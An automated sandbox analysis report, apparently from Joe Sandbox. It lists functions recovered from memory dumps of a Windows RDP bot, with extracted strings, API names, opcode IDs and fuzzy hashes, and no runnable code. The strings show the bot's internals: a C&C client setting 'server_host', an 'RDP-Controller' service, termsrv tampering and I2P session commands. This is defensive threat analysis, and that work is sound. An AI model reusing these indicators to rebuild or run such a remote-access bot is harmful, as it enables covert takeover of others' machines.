                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                                                                                                                                  • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                                                                                                                                  • API String ID: 1721699506-2273971785
                                                                                                                                                  • Opcode ID: fb69f4271079308d6a773b76607419c5d5bd62e2c2092df690b093a9c085742d
                                                                                                                                                  • Instruction ID: ccb10189459f1b3c87149a3b83366f1392d2e0875374105a6c27fee70dfb0798
                                                                                                                                                  • Opcode Fuzzy Hash: fb69f4271079308d6a773b76607419c5d5bd62e2c2092df690b093a9c085742d
                                                                                                                                                  • Instruction Fuzzy Hash: 3E616D61E0C54785FA308B5CE940BB82272AFB9798F554133F74ECB694DE3CE9668301
                                                                                                                                                  Function 00007FF8B9186C3D Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 134stringtimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CompareFileTime
                                                                                                                                                  • String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
                                                                                                                                                  • API String ID: 342285119-844192579
                                                                                                                                                  • Opcode ID: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
                                                                                                                                                  • Instruction ID: 5ec49a44ea275eaf98a0a2e00c77040399e4fb0a871c3d7812d6e86838ea2dd3
                                                                                                                                                  • Opcode Fuzzy Hash: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
                                                                                                                                                  • Instruction Fuzzy Hash: 8B519321B0C6C341FB219F2AA8D43BA5691AF857C4F464031EB9D4B7C7EE6DE905B740
                                                                                                                                                  Function 00007FF8BFB367C4 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 85memorysynchronizationCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait
                                                                                                                                                  • String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
                                                                                                                                                  • API String ID: 4048354325-2700516951
                                                                                                                                                  • Opcode ID: 4dff84fd8bfcbedcf79c475886653c1940979e13b65d628549cf3edeea3474e1
                                                                                                                                                  • Instruction ID: e14571fee02a8e7e5012417e383ac2db11643fc1e2ea79cda766e505de351d57
                                                                                                                                                  • Opcode Fuzzy Hash: 4dff84fd8bfcbedcf79c475886653c1940979e13b65d628549cf3edeea3474e1
                                                                                                                                                  • Instruction Fuzzy Hash: 65410C25E89A0782FF549FA9D96067463A1AF48BE4F184639DF2D463E5DE3CE4448310
                                                                                                                                                  Function 00007FF8BFB8961B Relevance: 21.2, APIs: 4, Strings: 10, Instructions: 181stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcpystrlen$strcmp
                                                                                                                                                  • String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
                                                                                                                                                  • API String ID: 245486318-5999096
                                                                                                                                                  • Opcode ID: eeba7b2acda8fb7677d32ffbf99bdfd9e78382d2291282e41cfa6244142f3c80
                                                                                                                                                  • Instruction ID: 51aa0585b63ad4a6c75e5a66557c7ea8c7fec59a2a4e2cd04572310cd8933f95
                                                                                                                                                  • Opcode Fuzzy Hash: eeba7b2acda8fb7677d32ffbf99bdfd9e78382d2291282e41cfa6244142f3c80
                                                                                                                                                  • Instruction Fuzzy Hash: AA713825E0DA4792EE249BADA9103B92390AF85BF4F684331DE6D577D6DF2CA901C340
                                                                                                                                                  Function 00007FF6BE038A03 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 118registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
                                                                                                                                                  • String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
                                                                                                                                                  • API String ID: 3562457520-1478336053
                                                                                                                                                  • Opcode ID: 7523986f2e4a8506a5b5db29a01fe4c528107e2010c565d689efa6122ba216ed
                                                                                                                                                  • Instruction ID: 2ccb8d536ea71506a83d6c837ed6fd11ee8705a222be6d0e24cd993385c0eaa0
                                                                                                                                                  • Opcode Fuzzy Hash: 7523986f2e4a8506a5b5db29a01fe4c528107e2010c565d689efa6122ba216ed
                                                                                                                                                  • Instruction Fuzzy Hash: FB511750E0CA0382FB70675C94D4BB912A09F7C745F2050B7F70EC62D2DE6DB9A68362
                                                                                                                                                  Function 00007FF8BFB890CA Relevance: 21.1, APIs: 9, Strings: 5, Instructions: 94memorystringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFree$fflushfwritestrlen
                                                                                                                                                  • String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
                                                                                                                                                  • API String ID: 1135201459-1870638116
                                                                                                                                                  • Opcode ID: 227849ff22b57d487b6f2f8b521884c8c6484f6d2e9304749063794b68413051
                                                                                                                                                  • Instruction ID: bb23f7ffd16834d1c0bdfac5e91b45da8c9275663be49b7cdab2347660a30c74
                                                                                                                                                  • Opcode Fuzzy Hash: 227849ff22b57d487b6f2f8b521884c8c6484f6d2e9304749063794b68413051
                                                                                                                                                  • Instruction Fuzzy Hash: A7316661A0E64691FE50AFDDEC446F56390AF89FC4F988035EF4E46796EE2CEA04C740
                                                                                                                                                  Function 00007FF8B915D110 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 105memorystringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFreestrcpystrlen
                                                                                                                                                  • String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
                                                                                                                                                  • API String ID: 925994320-1558387473
                                                                                                                                                  • Opcode ID: b18a5dea767c13263bad1b16b639a38f1e88cabe660c5e6b695c51396f16af22
                                                                                                                                                  • Instruction ID: e9d8b64337003f6161a576e53ae7d1ca0d2ee0460542316f32a0f7c578c08e4b
                                                                                                                                                  • Opcode Fuzzy Hash: b18a5dea767c13263bad1b16b639a38f1e88cabe660c5e6b695c51396f16af22
                                                                                                                                                  • Instruction Fuzzy Hash: E541ADA1A09BC686FA41AF1DD89037926A4BF84BC4F564034EF1E47396EE3CF841E310
                                                                                                                                                  Function 00007FF6BE0344F5 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen
                                                                                                                                                  • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                                                                                                                                  • API String ID: 39653677-3852240402
                                                                                                                                                  • Opcode ID: 46a9fd6f5dbb93ca6dc34309958f871f51596f7697ab3bf8847f5162564302a0
                                                                                                                                                  • Instruction ID: 9f70f0dca0338b189636b87f8e8308addc76dbd6f00428db645b7cb1d19ab4fd
                                                                                                                                                  • Opcode Fuzzy Hash: 46a9fd6f5dbb93ca6dc34309958f871f51596f7697ab3bf8847f5162564302a0
                                                                                                                                                  • Instruction Fuzzy Hash: 954142A1D08A4791FA219F1CE911BB92271FF78748F544132F75E8B296DF3CE9268341
                                                                                                                                                  Function 00007FF8BFB319D9 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 126networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
                                                                                                                                                  • String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
                                                                                                                                                  • API String ID: 2278979430-4175654481
                                                                                                                                                  • Opcode ID: 7de4627d2e25d44e7abf5dd777bf623c2155e1eeeef3ea356b014c5982bf9774
                                                                                                                                                  • Instruction ID: 047dc54615a6e2ae04fe799ecc112b8479d63ef431d7518752a35db5393e8c8c
                                                                                                                                                  • Opcode Fuzzy Hash: 7de4627d2e25d44e7abf5dd777bf623c2155e1eeeef3ea356b014c5982bf9774
                                                                                                                                                  • Instruction Fuzzy Hash: 44519A35E8868781EB208FADE9403B96364AB41BF4F145332DB7D076E8EF3DA9058701
                                                                                                                                                  Function 00007FF8B915C450 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                                                                                                                  • API String ID: 1004003707-2349658452
                                                                                                                                                  • Opcode ID: 002b80f4f3ddb5d95a8a589fbe732dd8bd41aee7437ac21d3b594941e9e699d2
                                                                                                                                                  • Instruction ID: 287578aa2a21f6dc6dcee38bb3bcc506b3ec7063b81699f57fea1b51d8e784ba
                                                                                                                                                  • Opcode Fuzzy Hash: 002b80f4f3ddb5d95a8a589fbe732dd8bd41aee7437ac21d3b594941e9e699d2
                                                                                                                                                  • Instruction Fuzzy Hash: 214128A1F086C7A6FA128F98E9507F42361AF043C8F554536EB4D46596EF7CFA49E300
                                                                                                                                                  Function 00007FF8B9188AE0 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                                                                                                                  • API String ID: 1004003707-2349658452
                                                                                                                                                  • Opcode ID: 487e31b225751ea3932902563ad00909ebac7d89d154fe2b6fceb74eda358456
                                                                                                                                                  • Instruction ID: 9b0912578886116a81987c5c4c44bf5b6750102ee600f4478cc9fca2ba00daaa
                                                                                                                                                  • Opcode Fuzzy Hash: 487e31b225751ea3932902563ad00909ebac7d89d154fe2b6fceb74eda358456
                                                                                                                                                  • Instruction Fuzzy Hash: D9414BA2A19AC796FA248F4CE9803F46360BF443C8F554536EB6D46196DF7CEA46F300
                                                                                                                                                  Function 00007FF8BFB58590 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                                                                                                                                  • API String ID: 1004003707-2349658452
                                                                                                                                                  • Opcode ID: 15574e2c6d2e1fb85edecffd2d2a439210e27da6631c3faf606f44d1bffa9230
                                                                                                                                                  • Instruction ID: 21cd5ac7ce71f56e562ba2d11933e912f2d0d3376197eff1f41c74a6f014f883
                                                                                                                                                  • Opcode Fuzzy Hash: 15574e2c6d2e1fb85edecffd2d2a439210e27da6631c3faf606f44d1bffa9230
                                                                                                                                                  • Instruction Fuzzy Hash: 96413861A09687A6FB108BC8E924BF8B361BF047C8F845532EB4D06595DF7CFA66C700
                                                                                                                                                  Function 00007FF8BFB8C550 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$cnccli$ini_get_var$server_host
                                                                                                                                                  • API String ID: 1004003707-2347851921
                                                                                                                                                  • Opcode ID: cf1616aad114c9908ff762f9604715a07226b35ad3038edca240e245e72a8459
                                                                                                                                                  • Instruction ID: f07e5cbd02b9b3525c4274db3b98549f494a0c24a44b145ed91f2e8310ea8dab
                                                                                                                                                  • Opcode Fuzzy Hash: cf1616aad114c9908ff762f9604715a07226b35ad3038edca240e245e72a8459
                                                                                                                                                  • Instruction Fuzzy Hash: 814136E1A09647A1FA519F98ED007F46360FB843D8F889432EB4D475A6DF3CE949C304
                                                                                                                                                  Function 00007FF8B915C2C9 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                                                                                                                                  • API String ID: 1004003707-693788558
                                                                                                                                                  • Opcode ID: f3b89cb6aefd98be79687eaabfb69af6a5614a3a306acbc797dd2fc7ffb4115a
                                                                                                                                                  • Instruction ID: fb7dab05c66821b3b72e5ff386bbbd29d16671e27b3e38712a75eed6b50636a7
                                                                                                                                                  • Opcode Fuzzy Hash: f3b89cb6aefd98be79687eaabfb69af6a5614a3a306acbc797dd2fc7ffb4115a
